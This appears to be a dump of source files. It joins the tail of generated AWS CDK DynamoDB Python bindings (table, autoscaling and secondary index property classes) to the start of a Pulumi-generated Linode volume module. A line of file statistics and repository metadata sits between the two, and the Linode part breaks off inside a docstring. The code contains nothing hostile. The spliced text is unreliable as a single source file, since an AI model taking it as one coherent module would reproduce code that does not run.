return not (rhs == self)
def __repr__(self) -> str:
return "TableOptions(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.TableProps",
jsii_struct_bases=[TableOptions],
name_mapping={
"partition_key": "partitionKey",
"billing_mode": "billingMode",
"encryption": "encryption",
"encryption_key": "encryptionKey",
"point_in_time_recovery": "pointInTimeRecovery",
"read_capacity": "readCapacity",
"removal_policy": "removalPolicy",
"replication_regions": "replicationRegions",
"server_side_encryption": "serverSideEncryption",
"sort_key": "sortKey",
"stream": "stream",
"time_to_live_attribute": "timeToLiveAttribute",
"write_capacity": "writeCapacity",
"table_name": "tableName",
},
)
class TableProps(TableOptions):
def __init__(
self,
*,
partition_key: "Attribute",
billing_mode: typing.Optional["BillingMode"] = None,
encryption: typing.Optional["TableEncryption"] = None,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
point_in_time_recovery: typing.Optional[bool] = None,
read_capacity: typing.Optional[jsii.Number] = None,
removal_policy: typing.Optional[aws_cdk.core.RemovalPolicy] = None,
replication_regions: typing.Optional[typing.List[str]] = None,
server_side_encryption: typing.Optional[bool] = None,
sort_key: typing.Optional["Attribute"] = None,
stream: typing.Optional["StreamViewType"] = None,
time_to_live_attribute: typing.Optional[str] = None,
write_capacity: typing.Optional[jsii.Number] = None,
table_name: typing.Optional[str] = None,
) -> None:
"""Properties for a DynamoDB Table.
:param partition_key: Partition key attribute definition.
:param billing_mode: Specify how you are charged for read and write throughput and how you manage capacity. Default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
:param encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``serverSideEncryption`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param encryption_key: External KMS key to use for table encryption. This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``. Default: - If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this property is undefined, a new KMS key will be created and associated with this table.
:param point_in_time_recovery: Whether point-in-time recovery is enabled. Default: - point-in-time recovery is disabled
:param read_capacity: The read capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
:param removal_policy: The removal policy to apply to the DynamoDB Table. Default: RemovalPolicy.RETAIN
:param replication_regions: Regions where replica tables will be created. Default: - no replica tables are created
:param server_side_encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param sort_key: Table sort key attribute definition. Default: no sort key
:param stream: When an item in the table is modified, StreamViewType determines what information is written to the stream for this table. Default: - streams are disabled unless ``replicationRegions`` is specified
:param time_to_live_attribute: The name of the TTL attribute. Default: - TTL is disabled
:param write_capacity: The write capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
:param table_name: Enforces a particular physical table name. Default: <generated>
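Example (illustrative sketch pinning the physical table name; the name
is a placeholder)::

Table(self, "Users",
partition_key=Attribute(name="userId", type=AttributeType.STRING),
table_name="users-prod",
)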
"""
if isinstance(partition_key, dict):
partition_key = Attribute(**partition_key)
if isinstance(sort_key, dict):
sort_key = Attribute(**sort_key)
self._values = {
"partition_key": partition_key,
}
if billing_mode is not None:
self._values["billing_mode"] = billing_mode
if encryption is not None:
self._values["encryption"] = encryption
if encryption_key is not None:
self._values["encryption_key"] = encryption_key
if point_in_time_recovery is not None:
self._values["point_in_time_recovery"] = point_in_time_recovery
if read_capacity is not None:
self._values["read_capacity"] = read_capacity
if removal_policy is not None:
self._values["removal_policy"] = removal_policy
if replication_regions is not None:
self._values["replication_regions"] = replication_regions
if server_side_encryption is not None:
self._values["server_side_encryption"] = server_side_encryption
if sort_key is not None:
self._values["sort_key"] = sort_key
if stream is not None:
self._values["stream"] = stream
if time_to_live_attribute is not None:
self._values["time_to_live_attribute"] = time_to_live_attribute
if write_capacity is not None:
self._values["write_capacity"] = write_capacity
if table_name is not None:
self._values["table_name"] = table_name
@builtins.property
def partition_key(self) -> "Attribute":
"""Partition key attribute definition."""
return self._values.get("partition_key")
@builtins.property
def billing_mode(self) -> typing.Optional["BillingMode"]:
"""Specify how you are charged for read and write throughput and how you manage capacity.
default
:default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
"""
return self._values.get("billing_mode")
@builtins.property
def encryption(self) -> typing.Optional["TableEncryption"]:
"""Whether server-side encryption with an AWS managed customer master key is enabled.
This property cannot be set if ``serverSideEncryption`` is set.
default
:default: - server-side encryption is enabled with an AWS owned customer master key
"""
return self._values.get("encryption")
@builtins.property
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""External KMS key to use for table encryption.
This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``.
default
:default:
- If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this
property is undefined, a new KMS key will be created and associated with this table.
"""
return self._values.get("encryption_key")
@builtins.property
def point_in_time_recovery(self) -> typing.Optional[bool]:
"""Whether point-in-time recovery is enabled.
default
:default: - point-in-time recovery is disabled
"""
return self._values.get("point_in_time_recovery")
@builtins.property
def read_capacity(self) -> typing.Optional[jsii.Number]:
"""The read capacity for the table.
Careful if you add Global Secondary Indexes, as
those will share the table's provisioned throughput.
Can only be provided if billingMode is Provisioned.
default
:default: 5
"""
return self._values.get("read_capacity")
@builtins.property
def removal_policy(self) -> typing.Optional[aws_cdk.core.RemovalPolicy]:
"""The removal policy to apply to the DynamoDB Table.
default
:default: RemovalPolicy.RETAIN
"""
return self._values.get("removal_policy")
@builtins.property
def replication_regions(self) -> typing.Optional[typing.List[str]]:
"""Regions where replica tables will be created.
default
:default: - no replica tables are created
stability
:stability: experimental
"""
return self._values.get("replication_regions")
@builtins.property
def server_side_encryption(self) -> typing.Optional[bool]:
"""Whether server-side encryption with an AWS managed customer master key is enabled.
This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set.
default
:default: - server-side encryption is enabled with an AWS owned customer master key
deprecated
:deprecated:
This property is deprecated. In order to obtain the same behavior as
enabling this, set the ``encryption`` property to ``TableEncryption.AWS_MANAGED`` instead.
stability
:stability: deprecated
"""
return self._values.get("server_side_encryption")
@builtins.property
def sort_key(self) -> typing.Optional["Attribute"]:
"""Table sort key attribute definition.
default
:default: no sort key
"""
return self._values.get("sort_key")
@builtins.property
def stream(self) -> typing.Optional["StreamViewType"]:
"""When an item in the table is modified, StreamViewType determines what information is written to the stream for this table.
default
:default: - streams are disabled unless ``replicationRegions`` is specified
"""
return self._values.get("stream")
@builtins.property
def time_to_live_attribute(self) -> typing.Optional[str]:
"""The name of TTL attribute.
default
:default: - TTL is disabled
"""
return self._values.get("time_to_live_attribute")
@builtins.property
def write_capacity(self) -> typing.Optional[jsii.Number]:
"""The write capacity for the table.
Careful if you add Global Secondary Indexes, as
those will share the table's provisioned throughput.
Can only be provided if billingMode is Provisioned.
default
:default: 5
"""
return self._values.get("write_capacity")
@builtins.property
def table_name(self) -> typing.Optional[str]:
"""Enforces a particular physical table name.
default
:default: <generated>
"""
return self._values.get("table_name")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TableProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.UtilizationScalingProps",
jsii_struct_bases=[aws_cdk.aws_applicationautoscaling.BaseTargetTrackingProps],
name_mapping={
"disable_scale_in": "disableScaleIn",
"policy_name": "policyName",
"scale_in_cooldown": "scaleInCooldown",
"scale_out_cooldown": "scaleOutCooldown",
"target_utilization_percent": "targetUtilizationPercent",
},
)
class UtilizationScalingProps(
aws_cdk.aws_applicationautoscaling.BaseTargetTrackingProps
):
def __init__(
self,
*,
disable_scale_in: typing.Optional[bool] = None,
policy_name: typing.Optional[str] = None,
scale_in_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
scale_out_cooldown: typing.Optional[aws_cdk.core.Duration] = None,
target_utilization_percent: jsii.Number,
) -> None:
"""Properties for enabling DynamoDB utilization tracking.
:param disable_scale_in: Indicates whether scale in by the target tracking policy is disabled. If the value is true, scale in is disabled and the target tracking policy won't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking policy can remove capacity from the scalable resource. Default: false
:param policy_name: A name for the scaling policy. Default: - Automatically generated name.
:param scale_in_cooldown: Period after a scale in activity completes before another scale in activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
:param scale_out_cooldown: Period after a scale out activity completes before another scale out activity can start. Default: Duration.seconds(300) for the following scalable targets: ECS services, Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters, Amazon SageMaker endpoint variants, Custom resources. For all other scalable targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB global secondary indexes, Amazon Comprehend document classification endpoints, Lambda provisioned concurrency
:param target_utilization_percent: Target utilization percentage for the attribute.
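Example (illustrative sketch; these props are the keyword arguments of
``scale_on_utilization`` on a scalable table attribute, and the capacity
bounds are placeholders)::

read_scaling = table.auto_scale_read_capacity(min_capacity=5, max_capacity=100)
read_scaling.scale_on_utilization(target_utilization_percent=70)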
"""
self._values = {
"target_utilization_percent": target_utilization_percent,
}
if disable_scale_in is not None:
self._values["disable_scale_in"] = disable_scale_in
if policy_name is not None:
self._values["policy_name"] = policy_name
if scale_in_cooldown is not None:
self._values["scale_in_cooldown"] = scale_in_cooldown
if scale_out_cooldown is not None:
self._values["scale_out_cooldown"] = scale_out_cooldown
@builtins.property
def disable_scale_in(self) -> typing.Optional[bool]:
"""Indicates whether scale in by the target tracking policy is disabled.
If the value is true, scale in is disabled and the target tracking policy
won't remove capacity from the scalable resource. Otherwise, scale in is
enabled and the target tracking policy can remove capacity from the
scalable resource.
default
:default: false
"""
return self._values.get("disable_scale_in")
@builtins.property
def policy_name(self) -> typing.Optional[str]:
"""A name for the scaling policy.
default
:default: - Automatically generated name.
"""
return self._values.get("policy_name")
@builtins.property
def scale_in_cooldown(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Period after a scale in activity completes before another scale in activity can start.
default
:default:
Duration.seconds(300) for the following scalable targets: ECS services,
Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters,
Amazon SageMaker endpoint variants, Custom resources. For all other scalable
targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB
global secondary indexes, Amazon Comprehend document classification endpoints,
Lambda provisioned concurrency
"""
return self._values.get("scale_in_cooldown")
@builtins.property
def scale_out_cooldown(self) -> typing.Optional[aws_cdk.core.Duration]:
"""Period after a scale out activity completes before another scale out activity can start.
default
:default:
Duration.seconds(300) for the following scalable targets: ECS services,
Spot Fleet requests, EMR clusters, AppStream 2.0 fleets, Aurora DB clusters,
Amazon SageMaker endpoint variants, Custom resources. For all other scalable
targets, the default value is Duration.seconds(0): DynamoDB tables, DynamoDB
global secondary indexes, Amazon Comprehend document classification endpoints,
Lambda provisioned concurrency
"""
return self._values.get("scale_out_cooldown")
@builtins.property
def target_utilization_percent(self) -> jsii.Number:
"""Target utilization percentage for the attribute."""
return self._values.get("target_utilization_percent")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "UtilizationScalingProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.GlobalSecondaryIndexProps",
jsii_struct_bases=[SecondaryIndexProps],
name_mapping={
"index_name": "indexName",
"non_key_attributes": "nonKeyAttributes",
"projection_type": "projectionType",
"partition_key": "partitionKey",
"read_capacity": "readCapacity",
"sort_key": "sortKey",
"write_capacity": "writeCapacity",
},
)
class GlobalSecondaryIndexProps(SecondaryIndexProps):
def __init__(
self,
*,
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
partition_key: "Attribute",
read_capacity: typing.Optional[jsii.Number] = None,
sort_key: typing.Optional["Attribute"] = None,
write_capacity: typing.Optional[jsii.Number] = None,
) -> None:
"""Properties for a global secondary index.
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
:param partition_key: The attribute of a partition key for the global secondary index.
:param read_capacity: The read capacity for the global secondary index. Can only be provided if table billingMode is Provisioned or undefined. Default: 5
:param sort_key: The attribute of a sort key for the global secondary index. Default: - No sort key
:param write_capacity: The write capacity for the global secondary index. Can only be provided if table billingMode is Provisioned or undefined. Default: 5
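Example (illustrative sketch; assumes an existing ``table``, with
placeholder index and attribute names)::

table.add_global_secondary_index(
index_name="byEmail",
partition_key=Attribute(name="email", type=AttributeType.STRING),
projection_type=ProjectionType.KEYS_ONLY,
)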
"""
if isinstance(partition_key, dict):
partition_key = Attribute(**partition_key)
if isinstance(sort_key, dict):
sort_key = Attribute(**sort_key)
self._values = {
"index_name": index_name,
"partition_key": partition_key,
}
if non_key_attributes is not None:
self._values["non_key_attributes"] = non_key_attributes
if projection_type is not None:
self._values["projection_type"] = projection_type
if read_capacity is not None:
self._values["read_capacity"] = read_capacity
if sort_key is not None:
self._values["sort_key"] = sort_key
if write_capacity is not None:
self._values["write_capacity"] = write_capacity
@builtins.property
def index_name(self) -> str:
"""The name of the secondary index."""
return self._values.get("index_name")
@builtins.property
def non_key_attributes(self) -> typing.Optional[typing.List[str]]:
"""The non-key attributes that are projected into the secondary index.
default
:default: - No additional attributes
"""
return self._values.get("non_key_attributes")
@builtins.property
def projection_type(self) -> typing.Optional["ProjectionType"]:
"""The set of attributes that are projected into the secondary index.
default
:default: ALL
"""
return self._values.get("projection_type")
@builtins.property
def partition_key(self) -> "Attribute":
"""The attribute of a partition key for the global secondary index."""
return self._values.get("partition_key")
@builtins.property
def read_capacity(self) -> typing.Optional[jsii.Number]:
"""The read capacity for the global secondary index.
Can only be provided if table billingMode is Provisioned or undefined.
default
:default: 5
"""
return self._values.get("read_capacity")
@builtins.property
def sort_key(self) -> typing.Optional["Attribute"]:
"""The attribute of a sort key for the global secondary index.
default
:default: - No sort key
"""
return self._values.get("sort_key")
@builtins.property
def write_capacity(self) -> typing.Optional[jsii.Number]:
"""The write capacity for the global secondary index.
Can only be provided if table billingMode is Provisioned or undefined.
default
:default: 5
"""
return self._values.get("write_capacity")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GlobalSecondaryIndexProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.LocalSecondaryIndexProps",
jsii_struct_bases=[SecondaryIndexProps],
name_mapping={
"index_name": "indexName",
"non_key_attributes": "nonKeyAttributes",
"projection_type": "projectionType",
"sort_key": "sortKey",
},
)
class LocalSecondaryIndexProps(SecondaryIndexProps):
def __init__(
self,
*,
index_name: str,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional["ProjectionType"] = None,
sort_key: "Attribute",
) -> None:
"""Properties for a local secondary index.
:param index_name: The name of the secondary index.
:param non_key_attributes: The non-key attributes that are projected into the secondary index. Default: - No additional attributes
:param projection_type: The set of attributes that are projected into the secondary index. Default: ALL
:param sort_key: The attribute of a sort key for the local secondary index.
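Example (illustrative sketch; assumes an existing ``table``, with
placeholder names)::

table.add_local_secondary_index(
index_name="byCreatedAt",
sort_key=Attribute(name="createdAt", type=AttributeType.STRING),
)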
"""
if isinstance(sort_key, dict):
sort_key = Attribute(**sort_key)
self._values = {
"index_name": index_name,
"sort_key": sort_key,
}
if non_key_attributes is not None:
self._values["non_key_attributes"] = non_key_attributes
if projection_type is not None:
self._values["projection_type"] = projection_type
@builtins.property
def index_name(self) -> str:
"""The name of the secondary index."""
return self._values.get("index_name")
@builtins.property
def non_key_attributes(self) -> typing.Optional[typing.List[str]]:
"""The non-key attributes that are projected into the secondary index.
default
:default: - No additional attributes
"""
return self._values.get("non_key_attributes")
@builtins.property
def projection_type(self) -> typing.Optional["ProjectionType"]:
"""The set of attributes that are projected into the secondary index.
default
:default: ALL
"""
return self._values.get("projection_type")
@builtins.property
def sort_key(self) -> "Attribute":
"""The attribute of a sort key for the local secondary index."""
return self._values.get("sort_key")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "LocalSecondaryIndexProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
__all__ = [
"Attribute",
"AttributeType",
"BillingMode",
"CfnTable",
"CfnTableProps",
"EnableScalingProps",
"GlobalSecondaryIndexProps",
"IScalableTableAttribute",
"ITable",
"LocalSecondaryIndexProps",
"ProjectionType",
"SecondaryIndexProps",
"StreamViewType",
"Table",
"TableAttributes",
"TableEncryption",
"TableOptions",
"TableProps",
"UtilizationScalingProps",
]
publication.publish()
| 44.894991 | 545 | 0.661849 | 22,825 | 195,383 | 5.540022 | 0.032158 | 0.040854 | 0.011744 | 0.021257 | 0.877739 | 0.858514 | 0.843157 | 0.828439 | 0.81698 | 0.807404 | 0 | 0.001559 | 0.241797 | 195,383 | 4,351 | 546 | 44.905309 | 0.852032 | 0.45117 | 0 | 0.74979 | 0 | 0 | 0.132557 | 0.066108 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116709 | false | 0 | 0.005877 | 0.026868 | 0.236776 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
612a2adbb6f54f7068ca124331205538b8b49847 | 22,043 | py | Python | sdk/python/pulumi_linode/volume.py | pulumi/pulumi-linode | dcdc078ddcad836dddf6f31879f0f0488bec33b4 | [
"ECL-2.0",
"Apache-2.0"
] | 18 | 2019-05-02T21:14:37.000Z | 2021-12-19T18:37:40.000Z | sdk/python/pulumi_linode/volume.py | pulumi/pulumi-linode | dcdc078ddcad836dddf6f31879f0f0488bec33b4 | [
"ECL-2.0",
"Apache-2.0"
] | 79 | 2019-05-01T17:52:03.000Z | 2022-03-31T15:31:56.000Z | sdk/python/pulumi_linode/volume.py | pulumi/pulumi-linode | dcdc078ddcad836dddf6f31879f0f0488bec33b4 | [
"ECL-2.0",
"Apache-2.0"
] | 6 | 2019-05-02T00:37:23.000Z | 2021-05-04T11:10:40.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['VolumeArgs', 'Volume']
@pulumi.input_type
class VolumeArgs:
def __init__(__self__, *,
label: pulumi.Input[str],
region: pulumi.Input[str],
linode_id: Optional[pulumi.Input[int]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Volume resource.
:param pulumi.Input[str] label: The label of the Linode Volume
:param pulumi.Input[str] region: The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
:param pulumi.Input[int] linode_id: The ID of a Linode Instance where the Volume should be attached.
:param pulumi.Input[int] size: Size of the Volume in GB.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
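Example (illustrative sketch; label, region and size are placeholders)::

import pulumi_linode as linode

volume = linode.Volume("backup-volume", linode.VolumeArgs(
label="backup-volume",
region="us-east",
size=30,
))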
"""
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "region", region)
if linode_id is not None:
pulumi.set(__self__, "linode_id", linode_id)
if size is not None:
pulumi.set(__self__, "size", size)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def label(self) -> pulumi.Input[str]:
"""
The label of the Linode Volume
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: pulumi.Input[str]):
pulumi.set(self, "label", value)
@property
@pulumi.getter
def region(self) -> pulumi.Input[str]:
"""
The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[str]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="linodeId")
def linode_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of a Linode Instance where the Volume should be attached.
"""
return pulumi.get(self, "linode_id")
@linode_id.setter
def linode_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "linode_id", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the Volume in GB.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _VolumeState:
def __init__(__self__, *,
filesystem_path: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
linode_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Volume resources.
:param pulumi.Input[str] filesystem_path: The full filesystem path for the Volume based on the Volume's label. Path is /dev/disk/by-id/scsi-0Linode_Volume_ +
Volume label.
:param pulumi.Input[str] label: The label of the Linode Volume
:param pulumi.Input[int] linode_id: The ID of a Linode Instance where the Volume should be attached.
:param pulumi.Input[str] region: The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
:param pulumi.Input[int] size: Size of the Volume in GB.
:param pulumi.Input[str] status: The status of the volume, indicating the current readiness state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
"""
if filesystem_path is not None:
pulumi.set(__self__, "filesystem_path", filesystem_path)
if label is not None:
pulumi.set(__self__, "label", label)
if linode_id is not None:
pulumi.set(__self__, "linode_id", linode_id)
if region is not None:
pulumi.set(__self__, "region", region)
if size is not None:
pulumi.set(__self__, "size", size)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="filesystemPath")
def filesystem_path(self) -> Optional[pulumi.Input[str]]:
"""
The full filesystem path for the Volume based on the Volume's label. Path is /dev/disk/by-id/scsi-0Linode_Volume_ +
Volume label.
"""
return pulumi.get(self, "filesystem_path")
@filesystem_path.setter
def filesystem_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filesystem_path", value)
@property
@pulumi.getter
def label(self) -> Optional[pulumi.Input[str]]:
"""
The label of the Linode Volume
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label", value)
@property
@pulumi.getter(name="linodeId")
def linode_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of a Linode Instance where the Volume should be attached.
"""
return pulumi.get(self, "linode_id")
@linode_id.setter
def linode_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "linode_id", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the Volume in GB.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The status of the volume, indicating the current readiness state.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class Volume(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
label: Optional[pulumi.Input[str]] = None,
linode_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Provides a Linode Volume resource. This can be used to create, modify, and delete Linode Block Storage Volumes. Block Storage Volumes are removable storage disks that persist outside the life-cycle of Linode Instances. These volumes can be attached to and detached from Linode instances throughout a region.
For more information, see [How to Use Block Storage with Your Linode](https://www.linode.com/docs/platform/block-storage/how-to-use-block-storage-with-your-linode/) and the [Linode APIv4 docs](https://developers.linode.com/api/v4#operation/createVolume).
## Example Usage
The following example shows how one might use this resource to configure a Block Storage Volume attached to a Linode Instance.
```python
import pulumi
import pulumi_linode as linode
foobaz = linode.Instance("foobaz",
root_pass="3X4mp13",
type="g6-nanode-1",
region="us-west",
tags=["foobaz"])
foobar = linode.Volume("foobar",
label="foo-volume",
region=foobaz.region,
linode_id=foobaz.id)
```
Volumes can also be attached using the Linode Instance config device map.
```python
import pulumi
import pulumi_linode as linode
foo = linode.Instance("foo",
configs=[linode.InstanceConfigArgs(
devices=linode.InstanceConfigDevicesArgs(
sda=linode.InstanceConfigDevicesSdaArgs(
volume_id=123,
),
),
kernel="linode/latest-64bit",
label="boot-existing-volume",
)],
region="us-east",
type="g6-nanode-1")
```
## Attributes
This resource exports the following attributes:
* `status` - The status of the Linode Volume. (`creating`, `active`, `resizing`, `contact_support`)
* `filesystem_path` - The full filesystem path for the Volume based on the Volume's label. The path is "/dev/disk/by-id/scsi-0Linode_Volume_" + the Volume label
## Import
Linode Volumes can be imported using the Linode Volume `id`, e.g.
```sh
$ pulumi import linode:index/volume:Volume myvolume 1234567
```
The Linode Guide, [Import Existing Infrastructure to Terraform](https://www.linode.com/docs/applications/configuration-management/import-existing-infrastructure-to-terraform/), offers resource importing examples for Block Storage Volumes and other Linode resource types.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] label: The label of the Linode Volume
:param pulumi.Input[int] linode_id: The ID of a Linode Instance where the Volume should be attached.
:param pulumi.Input[str] region: The region where this volume will be deployed. Examples are `"us-east"`, `"us-west"`, `"ap-south"`, etc. See all regions [here](https://api.linode.com/v4/regions). *Changing `region` forces the creation of a new Linode Volume.*.
:param pulumi.Input[int] size: Size of the Volume in GB.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VolumeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Linode Volume resource. This can be used to create, modify, and delete Linode Block Storage Volumes. Block Storage Volumes are removable storage disks that persist outside the life-cycle of Linode Instances. These volumes can be attached to and detached from Linode instances throughout a region.
For more information, see [How to Use Block Storage with Your Linode](https://www.linode.com/docs/platform/block-storage/how-to-use-block-storage-with-your-linode/) and the [Linode APIv4 docs](https://developers.linode.com/api/v4#operation/createVolume).
## Example Usage
The following example shows how one might use this resource to configure a Block Storage Volume attached to a Linode Instance.
```python
import pulumi
import pulumi_linode as linode
foobaz = linode.Instance("foobaz",
root_pass="3X4mp13",
type="g6-nanode-1",
region="us-west",
tags=["foobaz"])
foobar = linode.Volume("foobar",
label="foo-volume",
region=foobaz.region,
linode_id=foobaz.id)
```
Volumes can also be attached using the Linode Instance config device map.
```python
import pulumi
import pulumi_linode as linode
foo = linode.Instance("foo",
configs=[linode.InstanceConfigArgs(
devices=linode.InstanceConfigDevicesArgs(
sda=linode.InstanceConfigDevicesSdaArgs(
volume_id=123,
),
),
kernel="linode/latest-64bit",
label="boot-existing-volume",
)],
region="us-east",
type="g6-nanode-1")
```
## Attributes
